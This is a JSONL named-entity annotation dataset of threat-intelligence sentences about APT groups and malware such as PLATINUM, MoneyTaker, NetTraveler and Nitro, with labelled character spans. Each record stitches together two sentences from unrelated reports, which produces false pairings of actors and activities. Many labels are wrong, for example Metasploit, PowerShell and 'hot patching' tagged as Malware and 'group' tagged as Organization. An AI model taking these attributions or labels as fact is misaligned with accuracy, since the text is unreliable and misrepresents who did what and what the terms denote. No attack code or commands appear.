{"text": "A recent report documents a group of attackers known as \" PittyTiger \" that appears to have been active since at least 2011 ; however , they may have been operating as far back as 2008 . By analyzing the attack infrastructure , Group-IB identified that MoneyTaker group continuously exfiltrates internal banking documentation to learn about bank operations in preparation for future attacks .", "spans": [{"start": 28, "end": 33, "label": "Organization"}, {"start": 37, "end": 46, "label": "Organization"}, {"start": 58, "end": 68, "label": "Organization"}, {"start": 228, "end": 236, "label": "Organization"}, {"start": 253, "end": 269, "label": "Organization"}, {"start": 341, "end": 345, "label": "Organization"}]}
{"text": "We have been monitoring the activities of this group and believe they are operating from China . Group-IB reports that MoneyTaker uses both borrowed and their own self-written tools .", "spans": [{"start": 47, "end": 52, "label": "Organization"}, {"start": 97, "end": 105, "label": "Organization"}]}
{"text": "This threat group uses a first-stage malware known as Backdoor.APT.Pgift ( aka Troj/ReRol.A ) , which is dropped via malicious documents and connects back to a C2 server . Group-IB has provided Europol and Interpol with detailed information about the MoneyTaker group for further investigative activities as part of our cooperation in fighting cybercrime .", "spans": [{"start": 5, "end": 17, "label": "Organization"}, {"start": 54, "end": 72, "label": "Malware"}, {"start": 172, "end": 180, "label": "Organization"}]}
{"text": "By integrating the findings with prior research , it was possible to connect MONSOON directly with infrastructure used by the HANGOVER group via a series of strong connections . In late September 2015 Mofang used the website of Myanmara 's national airline hosted at www.flymna.com for an attack against an organization in Myanmar .", "spans": [{"start": 77, "end": 84, "label": "Organization"}, {"start": 126, "end": 140, "label": "Organization"}]}
{"text": "Backdoor.APT.PittyTiger \u2013 This malware is the classic \" PittyTiger \" malware ( PittyTigerV1.0 ) that was heavily used by this group in 2012 - 2013 . To control the full operation , MoneyTaker uses a Pentest framework Server .", "spans": [{"start": 0, "end": 23, "label": "System"}, {"start": 56, "end": 66, "label": "Organization"}, {"start": 79, "end": 93, "label": "System"}, {"start": 126, "end": 131, "label": "Organization"}, {"start": 181, "end": 191, "label": "Organization"}, {"start": 199, "end": 223, "label": "Malware"}]}
{"text": "Backdoor.APT.PittyTiger1.3 ( aka CT RAT ) \u2013 This malware is likely used as a second-stage backdoor . On it , MoneyTaker install a legitimate tool for penetration testing \u2013 Metasploit .", "spans": [{"start": 0, "end": 26, "label": "Malware"}, {"start": 33, "end": 39, "label": "System"}, {"start": 77, "end": 98, "label": "System"}, {"start": 109, "end": 119, "label": "Organization"}, {"start": 172, "end": 182, "label": "Malware"}]}
{"text": "It also appears the attackers use this as second-stage malware . At the end of June 2015 Mofang started its campaign to gather information of a specific target in relation to the sezs : the cpg Corporation .", "spans": [{"start": 20, "end": 29, "label": "Organization"}, {"start": 42, "end": 62, "label": "System"}, {"start": 190, "end": 205, "label": "Organization"}]}
{"text": "We have observed the Enfal malware in use since 2011 and in conjunction with Backdoor.APT.Pgift as the payload of a malicious document used in spearphishing attacks . MoneyTaker uses ' fileless ' malware only existing in RAM and is destroyed after reboot .", "spans": [{"start": 21, "end": 34, "label": "System"}, {"start": 77, "end": 95, "label": "Malware"}, {"start": 167, "end": 177, "label": "Organization"}, {"start": 185, "end": 193, "label": "Malware"}]}
{"text": "The Pitty Tiger group mostly uses spear phishing in order to gain an initial foothold within the targeted environment . To ensure persistence in the system MoneyTaker relies on PowerShell and VBS scripts - they are both difficult to detect by antivirus and easy to modify .", "spans": [{"start": 4, "end": 21, "label": "Organization"}, {"start": 156, "end": 166, "label": "Organization"}, {"start": 177, "end": 187, "label": "Malware"}, {"start": 192, "end": 203, "label": "Malware"}]}
{"text": "PittyTiger leverages social engineering to deliver spearphishing emails , in a variety of languages including English , French and Chinese , and email phishing pages to their targets . After successfully infecting one of the computers and gaining initial access to the system , the attackers perform reconnaissance of the local network in order to gain domain administrator privileges and eventually consolidate control over the network .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 21, "end": 39, "label": "Organization"}]}
{"text": "PLATINUM has been targeting its victims since at least as early as 2009 , and may have been active for several years prior . MUSTANG PANDA has previously used the observed microblogging site to host malicious PowerShell scripts and Microsoft Office documents in targeted attacks on Mongolia-focused NGOs .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 125, "end": 138, "label": "Organization"}, {"start": 209, "end": 227, "label": "Malware"}, {"start": 232, "end": 258, "label": "Malware"}, {"start": 299, "end": 303, "label": "Organization"}]}
{"text": "This section describes the history , behavior , and tactics of a newly discovered targeted activity group , which Microsoft has code-named PLATINUM . This newly observed activity uses a series of redirections and fileless , malicious implementations of legitimate tools to gain access to the targeted systems .", "spans": [{"start": 91, "end": 105, "label": "Organization"}, {"start": 114, "end": 123, "label": "Organization"}, {"start": 139, "end": 147, "label": "Organization"}]}
{"text": "Like many such groups , PLATINUM seeks to steal sensitive intellectual property related to government interests , but its range of preferred targets is consistently limited to specific governmental organizations , defense institutes , intelligence agencies , diplomatic institutions , and telecommunication providers in South and Southeast Asia . Unit 42 recently identified a targeted attack against an individual working for the Foreign Ministry of Uzbekistan in China .", "spans": [{"start": 15, "end": 21, "label": "Organization"}, {"start": 24, "end": 32, "label": "Organization"}, {"start": 91, "end": 101, "label": "Organization"}, {"start": 185, "end": 211, "label": "Organization"}, {"start": 214, "end": 232, "label": "Organization"}, {"start": 235, "end": 256, "label": "Organization"}, {"start": 259, "end": 282, "label": "Organization"}, {"start": 289, "end": 316, "label": "Organization"}, {"start": 347, "end": 354, "label": "Organization"}, {"start": 431, "end": 447, "label": "Organization"}]}
{"text": "PLATINUM 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . Since that time , MoneyTaker attacked companies in California , Utah , Oklahoma , Colorado , Illinois , Missouri , South Carolina , North Carolina , Virginia and Florida .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 82, "end": 102, "label": "Organization"}, {"start": 143, "end": 160, "label": "Vulnerability"}, {"start": 220, "end": 230, "label": "Organization"}]}
{"text": "The group 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . In their Operation Tropic Trooper report , Trend Micro documented the behaviour and functionality of an espionage toolkit with several design similarities to those observed in the various components of KeyBoy .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 83, "end": 103, "label": "Organization"}, {"start": 144, "end": 161, "label": "Vulnerability"}, {"start": 246, "end": 257, "label": "Organization"}, {"start": 307, "end": 324, "label": "Indicator"}, {"start": 405, "end": 411, "label": "Malware"}]}
{"text": "LATINUM makes a concerted effort to hide their infection tracks , by self-deleting malicious components , or by using server side logic in ' one shot mode ' where remotely hosted malicious components are only allowed to load once . Our analysis shows that actors attempted to exploit CVE-2012-0158 to install NetTraveler Trojan .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 69, "end": 103, "label": "System"}, {"start": 118, "end": 135, "label": "System"}, {"start": 276, "end": 283, "label": "Vulnerability"}, {"start": 284, "end": 297, "label": "Vulnerability"}, {"start": 309, "end": 327, "label": "Malware"}]}
{"text": "PLATINUM often spear phishes its targets at their non-official or private email accounts , to use as a stepping stone into the intended organization 's network . Unit 42 's analysis shows that NetTraveler attempted to exploit CVE-2012-0158 to install NetTraveler Trojan .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 162, "end": 169, "label": "Organization"}, {"start": 193, "end": 204, "label": "Malware"}, {"start": 218, "end": 225, "label": "Vulnerability"}, {"start": 226, "end": 239, "label": "Vulnerability"}, {"start": 251, "end": 269, "label": "Malware"}]}
{"text": "PLATINUM uses custom-developed malicious tools and has the resources to update these applications often to avoid being detected . Our analysis shows that NetTraveler attempted to exploit CVE-2012-0158 to install NetTraveler Trojan .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 14, "end": 46, "label": "System"}, {"start": 154, "end": 165, "label": "Malware"}, {"start": 179, "end": 186, "label": "Vulnerability"}, {"start": 187, "end": 200, "label": "Vulnerability"}, {"start": 212, "end": 230, "label": "Malware"}]}
{"text": "PLATINUM primarily targets its intended victims using spear phishing . In 2016 , Group-IB identified 10 attacks conducted by MoneyTaker , 6 attacks on banks in the US , 1 attack on a US service provider , 1 attack on a bank in the UK and 2 attacks on Russian banks .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 81, "end": 89, "label": "Organization"}, {"start": 151, "end": 156, "label": "Organization"}, {"start": 186, "end": 202, "label": "Organization"}, {"start": 219, "end": 223, "label": "Organization"}, {"start": 259, "end": 264, "label": "Organization"}]}
{"text": "PLATINUM configures its backdoor malware to restrict its activities to victims ' working hours , in an attempt to disguise post-infection network activity within normal user traffic . If KeyBoy is a single component of a larger espionage toolkit , the developers may have realized that this older , static-key based , configuration encoding algorithm was inadvertently providing a link between disparate components of their malware suite .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 187, "end": 193, "label": "Malware"}, {"start": 318, "end": 350, "label": "Malware"}]}
{"text": "PLATINUM does not conduct its espionage activity to engage in direct financial gain , but instead uses stolen information for indirect economic advantages . In 2016 , Group-IB identified 10 attacks conducted by MoneyTaker ; 6 attacks on banks in the US , 1 attack on a US service provider , 1 attack on a bank in the UK and 2 attacks on Russian banks .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 135, "end": 143, "label": "Organization"}, {"start": 167, "end": 175, "label": "Organization"}, {"start": 237, "end": 242, "label": "Organization"}, {"start": 272, "end": 288, "label": "Organization"}, {"start": 305, "end": 309, "label": "Organization"}, {"start": 345, "end": 350, "label": "Organization"}]}
{"text": "PLATINUM is known to have used a number of zero-day exploits , for which no security update is available at the time of transmission , in these attempts . The NetTraveler trojan has been known to be used in targeted cyber espionage attacks for more than a decade by nation state threat actors and continues to be used to target its victims and exfiltrate data .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 43, "end": 60, "label": "Vulnerability"}, {"start": 159, "end": 177, "label": "Malware"}]}
{"text": "For the initial infection , PLATINUM typically sends malicious documents that contain exploits for vulnerabilities in various software programs , with links or remotely loaded components ( images or scripts or templates ) that are delivered to targets only once . The exploit document carrying this alternate KeyBoy configuration also used a decoy document which was displayed to the user after the exploit launched .", "spans": [{"start": 28, "end": 36, "label": "Organization"}, {"start": 268, "end": 284, "label": "Indicator"}, {"start": 309, "end": 315, "label": "Malware"}, {"start": 342, "end": 356, "label": "Indicator"}, {"start": 399, "end": 406, "label": "Vulnerability"}]}
{"text": "PLATINUM 's approach toward exploiting vulnerabilities varies between campaigns . Only one incident involving a Russian bank was promptly identified and prevented that is known to Group-IB .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 120, "end": 124, "label": "Organization"}, {"start": 180, "end": 188, "label": "Organization"}]}
{"text": "The document , when opened , used an embedded ActiveX control to download a JavaScript file from a remote site that used a previously unknown vulnerability in some versions of Windows ( later designated CVE-2013-7331 ) to read information about the browser 's installed components . This program is designed to capture keystrokes , take screenshots of the user 's desktop and get contents from the clipboard .", "spans": [{"start": 46, "end": 61, "label": "System"}, {"start": 76, "end": 91, "label": "Malware"}, {"start": 203, "end": 216, "label": "Vulnerability"}]}
{"text": "When the document was opened in Word , PLATINUM exploited a previously unknown vulnerability in the Microsoft Office PostScript interpreter ( designated CVE-2015-2545 ) that enabled it to execute the attacker 's code and drop an attacker-generated malicious DLL onto the computer . To conduct targeted attacks , MoneyTaker use a distributed infrastructure that is difficult to track .", "spans": [{"start": 32, "end": 36, "label": "System"}, {"start": 39, "end": 47, "label": "Organization"}, {"start": 153, "end": 166, "label": "Vulnerability"}, {"start": 200, "end": 208, "label": "Organization"}, {"start": 312, "end": 322, "label": "Organization"}, {"start": 329, "end": 355, "label": "Malware"}]}
{"text": "n one case from 2013 , the target was sent a malicious document through a spear phishing email message . This technique hides the true C2 server from researchers that do not have access to both the rastls.dll and Sycmentec.config files .", "spans": [{"start": 45, "end": 63, "label": "Malware"}, {"start": 135, "end": 137, "label": "System"}, {"start": 198, "end": 208, "label": "Indicator"}, {"start": 213, "end": 235, "label": "Indicator"}]}
{"text": "The DLL exploited another previously unknown vulnerability ( designated CVE-2015-2546 ) in the Windows kernel , which enabled it to elevate privileges for the Word executable and subsequently install a backdoor through the application . Hackers use Metasploit to conduct all these activities : network reconnaissance , search for vulnerable applications , exploit vulnerabilities , escalate systems privileges , and collect information .", "spans": [{"start": 4, "end": 7, "label": "System"}, {"start": 72, "end": 85, "label": "Vulnerability"}, {"start": 159, "end": 163, "label": "System"}, {"start": 249, "end": 259, "label": "Malware"}, {"start": 356, "end": 363, "label": "Vulnerability"}]}
{"text": "When the document was opened in Word , it exploited a previously unknown vulnerability in the Microsoft Office PostScript interpreter ( designated CVE-2015-2545 ) that enabled it to execute the attacker 's code and drop an attacker-generated malicious DLL onto the computer . Over the years they've used application components from Norman , McAfee and Norton .", "spans": [{"start": 32, "end": 36, "label": "System"}, {"start": 147, "end": 160, "label": "Vulnerability"}, {"start": 194, "end": 202, "label": "Organization"}, {"start": 332, "end": 338, "label": "Organization"}, {"start": 341, "end": 347, "label": "Organization"}, {"start": 352, "end": 358, "label": "Organization"}]}
{"text": "In total , PLATINUM made use of four zero-day exploits during these two attack campaigns ( two remote code execution bugs , one privilege escalation , and one information disclosure ) , showing an ability to spend a non-trivial amount of resources to either acquire professionally written zero-day exploits from unknown markets , or research and utilize the zero-day exploits themselves . Recently , Falcon Intelligence observed new activity from MUSTANG PANDA , using a unique infection chain to target likely Mongolia-based victims .", "spans": [{"start": 11, "end": 19, "label": "Organization"}, {"start": 37, "end": 54, "label": "Vulnerability"}, {"start": 289, "end": 306, "label": "Vulnerability"}, {"start": 358, "end": 375, "label": "Vulnerability"}, {"start": 400, "end": 419, "label": "Organization"}, {"start": 478, "end": 493, "label": "Malware"}]}
{"text": "Researching this attack and the malware used therein led Microsoft to discover other instances of PLATINUM attacking users in India around August 2015 . Throughout the years , the Mofang group has compromised countless servers belonging to government or other Myanmar related organizations , in order to stage attacks .", "spans": [{"start": 57, "end": 66, "label": "Organization"}, {"start": 98, "end": 106, "label": "Organization"}, {"start": 117, "end": 122, "label": "Organization"}, {"start": 240, "end": 250, "label": "Organization"}]}
{"text": "In both these campaigns the activity group included remote triggers to deactivate exploitation , with an attempt to conceal the vulnerability , and prevent analysis of the attack . This file requires the target to attempt to open the .lnk file , which redirects the user to a Windows Scripting Component ( .wsc ) file , hosted on an adversary-controlled microblogging page .", "spans": [{"start": 28, "end": 42, "label": "Organization"}, {"start": 234, "end": 243, "label": "Indicator"}, {"start": 276, "end": 283, "label": "System"}]}
{"text": "After gaining access to a victim 's computer , PLATINUM installs its own custom-built malware to communicate with the compromised system , issue commands , and move laterally through the network . A report published by Kaspersky Labs in 2011 on NetTraveler also mentions the C2 servers were being hosted by Krypt Technolgies .", "spans": [{"start": 47, "end": 55, "label": "Organization"}, {"start": 73, "end": 93, "label": "System"}, {"start": 219, "end": 233, "label": "Organization"}, {"start": 245, "end": 256, "label": "Malware"}, {"start": 275, "end": 277, "label": "System"}]}
{"text": "PLATINUM uses a number of different custom-developed backdoors to communicate with infected computers . Obviously , the developers behind NetTraveler have taken steps to try to hide the malware 's configuration .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 36, "end": 62, "label": "System"}, {"start": 138, "end": 149, "label": "Malware"}]}
{"text": "This section describes some of the tools used by the group . In this report , we'll review how the actors attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan .", "spans": [{"start": 53, "end": 58, "label": "Organization"}, {"start": 119, "end": 126, "label": "Vulnerability"}, {"start": 127, "end": 140, "label": "Vulnerability"}, {"start": 156, "end": 174, "label": "Malware"}]}
{"text": "The lack of any significant evidence of shared code between any of these backdoor families is another clue as to the scope of the resources on which the activity group is able to draw , and the precautions the group is willing and able to take in order to avoid losing its ability to conduct its espionage operations . In this report , we'll review how NetTraveler attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan .", "spans": [{"start": 153, "end": 167, "label": "Organization"}, {"start": 210, "end": 215, "label": "Organization"}, {"start": 353, "end": 364, "label": "Malware"}, {"start": 378, "end": 385, "label": "Vulnerability"}, {"start": 386, "end": 399, "label": "Vulnerability"}, {"start": 415, "end": 433, "label": "Malware"}]}
{"text": "In addition to Dipsind and its variants , PLATINUM uses a few other families of custom-built backdoors within its attack toolset . In this report , we'll review how the NetTraveler attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan .", "spans": [{"start": 15, "end": 22, "label": "System"}, {"start": 42, "end": 50, "label": "Organization"}, {"start": 80, "end": 102, "label": "System"}, {"start": 169, "end": 180, "label": "Malware"}, {"start": 194, "end": 201, "label": "Vulnerability"}, {"start": 202, "end": 215, "label": "Vulnerability"}, {"start": 231, "end": 249, "label": "Malware"}]}
{"text": "The PLATINUM group has written a few different versions of keyloggers that perform their functions in different ways , most likely to take advantage of different weaknesses in victims ' computing environments . Upon successful exploitation , the attachment will install the Trojan known as NetTraveler using a DLL side-loading attack technique .", "spans": [{"start": 4, "end": 18, "label": "Organization"}, {"start": 59, "end": 69, "label": "System"}, {"start": 246, "end": 256, "label": "Indicator"}, {"start": 274, "end": 280, "label": "Malware"}, {"start": 290, "end": 301, "label": "Malware"}, {"start": 310, "end": 326, "label": "Indicator"}]}
{"text": "While one family relies on a small number of supported commands and simple shells , the other delves into more convoluted methods of injections , checks , and supported feature sets . NetTraveler has been used to target diplomats , embassies and government institutions for over a decade , and remains the tool of choice by the adversaries behind these cyber espionage campaigns .", "spans": [{"start": 184, "end": 195, "label": "Malware"}, {"start": 220, "end": 229, "label": "Organization"}, {"start": 232, "end": 241, "label": "Organization"}, {"start": 246, "end": 269, "label": "Organization"}]}
{"text": "Both groups can set permissions on specific files to Everyone , and work in tandem with the PLATINUM backdoors . WildFire correctly classifies NetTraveler as malicious .", "spans": [{"start": 5, "end": 11, "label": "Organization"}, {"start": 16, "end": 31, "label": "Malware"}, {"start": 92, "end": 110, "label": "System"}, {"start": 113, "end": 121, "label": "Organization"}, {"start": 143, "end": 154, "label": "Malware"}]}
{"text": "In particular , this second group also has the capability of dumping users ' credentials using the same technique employed by Mimikatz . The NetTraveler group has infected victims across multiple establishments in both the public and private sector including government institutions , embassies , the oil and gas industry , research centers , military contractors and activists .", "spans": [{"start": 28, "end": 33, "label": "Organization"}, {"start": 126, "end": 134, "label": "System"}, {"start": 259, "end": 282, "label": "Organization"}, {"start": 285, "end": 294, "label": "Organization"}, {"start": 301, "end": 321, "label": "Organization"}, {"start": 343, "end": 363, "label": "Organization"}, {"start": 368, "end": 377, "label": "Organization"}]}
{"text": "In addition to using several publicly known injection methods to perform this task , it also takes advantage of an obscure operating system feature known as hot patching . Today Kaspersky Lab 's team of experts published a new research report about NetTraveler , which is a family of malicious programs used by APT actors to successfully compromise more than 350 high-profile victims in 40 countries .", "spans": [{"start": 178, "end": 191, "label": "Organization"}, {"start": 249, "end": 260, "label": "Malware"}]}
{"text": "One of PLATINUM 's most recent and interesting tools is meant to inject code into processes using a variety of injection techniques . According to Kaspersky Lab 's report , this threat actor has been active since as early as 2004 ; however , the highest volume of activity occurred from 2010 \u2013 2013 .", "spans": [{"start": 7, "end": 15, "label": "Organization"}, {"start": 147, "end": 160, "label": "Organization"}]}
{"text": "At a high level , hot patching can transparently apply patches to executables and DLLs in actively running processes , which does not happen with traditional methods of code injection such as CreateRemoteThread or WriteProcessMemory . Most recently , the NetTraveler group 's main domains of interest for cyberespionage activities include space exploration , nanotechnology , energy production , nuclear power , lasers , medicine and communications .", "spans": [{"start": 49, "end": 62, "label": "Malware"}, {"start": 192, "end": 210, "label": "Malware"}, {"start": 214, "end": 232, "label": "Malware"}, {"start": 339, "end": 356, "label": "Organization"}, {"start": 359, "end": 373, "label": "Organization"}, {"start": 376, "end": 393, "label": "Organization"}, {"start": 396, "end": 409, "label": "Organization"}, {"start": 412, "end": 418, "label": "Organization"}, {"start": 421, "end": 429, "label": "Organization"}, {"start": 434, "end": 448, "label": "Organization"}]}
{"text": "Hot patching is an operating system-supported feature for installing updates without having to reboot or restart a process . In addition , the NetTraveler toolkit was able to install additional info-stealing malware as a backdoor , and it could be customized to steal other types of sensitive information such as configuration details for an application or computer-aided design files .", "spans": [{"start": 19, "end": 53, "label": "System"}, {"start": 58, "end": 76, "label": "Malware"}, {"start": 143, "end": 162, "label": "Malware"}]}
{"text": "Multiple Dipsind variants have been identified , all of which are believed to be used exclusively by PLATINUM . During Kaspersky Lab 's analysis of NetTraveler , the company 's experts identified six victims that had been infected by both NetTraveler and Red October , which was another cyberespionage operation analyzed by Kaspersky Lab in January 2013 .", "spans": [{"start": 9, "end": 16, "label": "System"}, {"start": 101, "end": 109, "label": "Organization"}, {"start": 119, "end": 132, "label": "Organization"}, {"start": 148, "end": 159, "label": "Malware"}, {"start": 324, "end": 337, "label": "Organization"}]}
{"text": "The group 's most frequently used backdoors belong to a malware family that Microsoft has designated Dipsind , although some variants are detected under different names . Kaspersky Lab 's products detect and neutralize the malicious programs and its variants used by the NetTraveler Toolkit , including Trojan-Spy.Win32.TravNet and Downloader.Win32.NetTraveler .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 76, "end": 85, "label": "Organization"}, {"start": 101, "end": 108, "label": "System"}, {"start": 171, "end": 184, "label": "Organization"}, {"start": 271, "end": 290, "label": "Malware"}, {"start": 303, "end": 327, "label": "Malware"}, {"start": 332, "end": 360, "label": "Malware"}]}
{"text": "The technique PLATINUM uses to inject code via hot patching was first documented by security researchers in 2013.7 Administrator permissions are required for hot patching , and the technique used by PLATINUM does not attempt to evade this requirement through exploitation . Based on Kaspersky Lab 's analysis of NetTraveler 's C&C data , there were a total of 350 victims in 40 countries across including the United States , Canada , United Kingdom , Russia , Chile , Morocco , Greece , Belgium , Austria , Ukraine , Lithuania , Belarus , Australia , Hong Kong , Japan , China , Mongolia , Iran , Turkey , India , Pakistan , South Korea , Thailand , Qatar , Kazakhstan , and Jordan .", "spans": [{"start": 14, "end": 22, "label": "Organization"}, {"start": 199, "end": 207, "label": "Organization"}, {"start": 283, "end": 296, "label": "Organization"}, {"start": 327, "end": 330, "label": "System"}]}
{"text": "PLATINUM has used several zero-day exploits against their victims . Kaspersky Lab 's products detect the Microsoft Office exploits used in the spear-phishing attacks , including Exploit.MSWord.CVE-2010-333 , Exploit.Win32.CVE-2012-0158 .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 26, "end": 43, "label": "Vulnerability"}, {"start": 68, "end": 81, "label": "Organization"}, {"start": 105, "end": 121, "label": "Organization"}, {"start": 122, "end": 130, "label": "Vulnerability"}, {"start": 178, "end": 205, "label": "Indicator"}, {"start": 208, "end": 235, "label": "Indicator"}]}
{"text": "The technique PLATINUM uses to inject code via hot patching was first documented by security researchers in 2013.7 . In this case , it was a group commonly referred to as \" Nitro \" , which was coined by Symantec in its 2011 whitepaper .", "spans": [{"start": 14, "end": 22, "label": "Organization"}, {"start": 203, "end": 211, "label": "Organization"}]}
{"text": "PLATINUM has consistently targeted victims within a small set of countries in South and Southeast Asia . Historically , Nitro is known for targeted spear phishing campaigns and using Poison Ivy malware , which was not seen in these attacks .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 183, "end": 201, "label": "Malware"}]}
{"text": "PLATINUM has developed or commissioned a number of custom tools to provide the group with access to victim resources . Since at least 2013 , Nitro appears to have somewhat modified their malware and delivery methods to include Spindest and legitimate compromised websites , as reported by Cyber Squared 's TCIRT .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 51, "end": 63, "label": "System"}, {"start": 227, "end": 235, "label": "Malware"}, {"start": 240, "end": 271, "label": "Malware"}, {"start": 289, "end": 311, "label": "Organization"}]}
{"text": "Some of the tools used by PLATINUM , such as the port-knocking backdoor , show signs of organized thinking . In July , Nitro compromised a South Korean clothing and accessories manufacturer 's website to serve malware commonly referred to as \" Spindest \" . Of all the samples we've tied to this activity so far noted in this blog , this is the only one configured to connect directly to an IP address for Command and Control ( C2 ) .", "spans": [{"start": 26, "end": 34, "label": "Organization"}, {"start": 244, "end": 252, "label": "Malware"}, {"start": 390, "end": 392, "label": "Indicator"}, {"start": 427, "end": 429, "label": "System"}]}
{"text": "Take advantage of native mitigations built into Windows 10 . The next sample was another Spindest variant and had the same timestamp as the aforementioned PcClient sample .", "spans": [{"start": 89, "end": 97, "label": "Malware"}, {"start": 155, "end": 170, "label": "Malware"}]}
{"text": "For example , the summer 2015 attack that used the unusual ' resume ' would not have been successful on Windows 10 as-is because of the presence of the Supervisor Mode Execution Prevention ( SMEP ) mitigation , even without the latest security updates installed . As this post and previous cited research show , APT groups such as Nitro will continue to evolve their techniques within the kill chain to avoid detection .", "spans": []}
{"text": "Even if CVE-2015-2546 affected Windows 10 , the exploitation would have required much more technical prowess to succeed ; ultimately , SMEP makes it more difficult for attackers . attacks on the chemical industry are merely their latest attack wave .", "spans": [{"start": 8, "end": 21, "label": "Vulnerability"}, {"start": 168, "end": 177, "label": "Organization"}, {"start": 195, "end": 212, "label": "Organization"}]}
{"text": "For example , one zero-day vulnerability exploit ( CVE-2015-2545 ) used by PLATINUM was addressed immediately in September 2015 . The goal of the attackers appears to be to collect intellectual property such as design documents , formulas , and manufacturing processes .", "spans": [{"start": 18, "end": 40, "label": "Vulnerability"}, {"start": 51, "end": 64, "label": "Vulnerability"}, {"start": 75, "end": 83, "label": "Organization"}]}
{"text": "Since the 2016 publication , Microsoft has come across an evolution of PLATINUM 's file-transfer tool , one that uses the Intel\u00ae Active Management Technology ( AMT ) Serial-over-LAN ( SOL ) channel for communication . The attack wave started in late July 2011 and continued into midSeptember 2011 .", "spans": [{"start": 29, "end": 38, "label": "Organization"}, {"start": 71, "end": 79, "label": "Organization"}, {"start": 122, "end": 157, "label": "System"}, {"start": 160, "end": 163, "label": "System"}, {"start": 166, "end": 181, "label": "System"}, {"start": 184, "end": 187, "label": "System"}]}
{"text": "Since the 2016 publication , Microsoft has come across an evolution of PLATINUM 's file-transfer tool , one that uses the Intel Active Management Technology ( AMT ) Serial-over-LAN ( SOL ) channel for communication . The purpose of the attacks appears to be industrial espionage , collecting intellectual property for competitive advantage .", "spans": [{"start": 29, "end": 38, "label": "Organization"}, {"start": 71, "end": 79, "label": "Organization"}, {"start": 122, "end": 156, "label": "System"}, {"start": 159, "end": 162, "label": "System"}, {"start": 165, "end": 180, "label": "System"}, {"start": 183, "end": 186, "label": "System"}]}
{"text": "Until this incident , no malware had been discovered misusing the AMT SOL feature for communication . They then moved on to the motor industry in late May .", "spans": [{"start": 86, "end": 99, "label": "Malware"}, {"start": 128, "end": 142, "label": "Organization"}]}
{"text": "We confirmed that the tool did not expose vulnerabilities in the management technology itself , but rather misused AMT SOL within target networks that have already been compromised to keep communication stealthy and evade security applications . From late April to early May , the attackers focused on human rights related NGOs .", "spans": [{"start": 323, "end": 327, "label": "Organization"}]}
{"text": "In either case , PLATINUM would need to have gained administrative privileges on targeted systems prior to the feature 's misuse . Attackers then moved on to the motor industry in late May .", "spans": [{"start": 17, "end": 25, "label": "Organization"}, {"start": 162, "end": 176, "label": "Organization"}]}
{"text": "The updated tool has only been seen in a handful of victim computers within organizational networks in Southeast Asia\u2014PLATINUM is known to customize tools based on the network architecture of targeted organizations . At this point , the current attack campaign against the chemical industry began .", "spans": [{"start": 273, "end": 290, "label": "Organization"}]}
{"text": "One possibility is that PLATINUM might have obtained compromised credentials from victim networks . The attackers first researched desired targets and then sent an email specifically to the target .", "spans": [{"start": 24, "end": 32, "label": "Organization"}]}
{"text": "Another possibility is that the targeted systems did not have AMT provisioned and PLATINUM , once they've obtained administrative privileges on the system , proceeded to provision AMT . First , when a specific recipient was targeted , the mails often purported to be meeting invitations from established business partners .", "spans": [{"start": 62, "end": 65, "label": "System"}, {"start": 82, "end": 90, "label": "Organization"}]}
{"text": "During the provisioning process , PLATINUM could select whichever username and password they wish . While the attackers used different pretexts when sending these malicious emails , two methodologies stood out .", "spans": [{"start": 34, "end": 42, "label": "Organization"}, {"start": 173, "end": 179, "label": "System"}]}
{"text": "The new SOL protocol within the PLATINUM file-transfer tool makes use of the AMT Technology SDK 's Redirection Library API ( imrsdk.dll ) . Secondly , when the emails were being sent to a broad set of recipients , the mails purported to be a necessary security update .", "spans": [{"start": 32, "end": 40, "label": "Organization"}, {"start": 77, "end": 95, "label": "System"}, {"start": 99, "end": 122, "label": "System"}, {"start": 125, "end": 135, "label": "Malware"}, {"start": 160, "end": 166, "label": "System"}]}
{"text": "The PLATINUM tool is , to our knowledge , the first malware sample observed to misuse chipset features in this way . The attacks were traced back to a computer system that was a virtual private server ( VPS ) located in the United States .", "spans": [{"start": 4, "end": 17, "label": "System"}, {"start": 52, "end": 59, "label": "System"}, {"start": 203, "end": 206, "label": "System"}]}
{"text": "Microsoft reiterates that the PLATINUM tool does not expose flaws in Intel\u00ae Active Management Technology ( AMT ) , but uses the technology within an already compromised network to evade security monitoring tools . Attackers are sending malicious PDF and DOC files , which use exploits to drop variants of Backdoor.Sogu .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 30, "end": 38, "label": "Organization"}, {"start": 69, "end": 104, "label": "System"}, {"start": 107, "end": 110, "label": "System"}, {"start": 246, "end": 249, "label": "Malware"}, {"start": 254, "end": 263, "label": "Malware"}, {"start": 305, "end": 318, "label": "Malware"}]}
{"text": "The discovery of this new PLATINUM technique and the development of detection capabilities highlight the work the Windows Defender ATP team does to provide customers greater visibility into suspicious activities transpiring on their networks . This particular threat was also used by hackers to compromise a Korean social network site to steal records of 35 million users .", "spans": [{"start": 26, "end": 34, "label": "Organization"}, {"start": 114, "end": 134, "label": "Organization"}]}
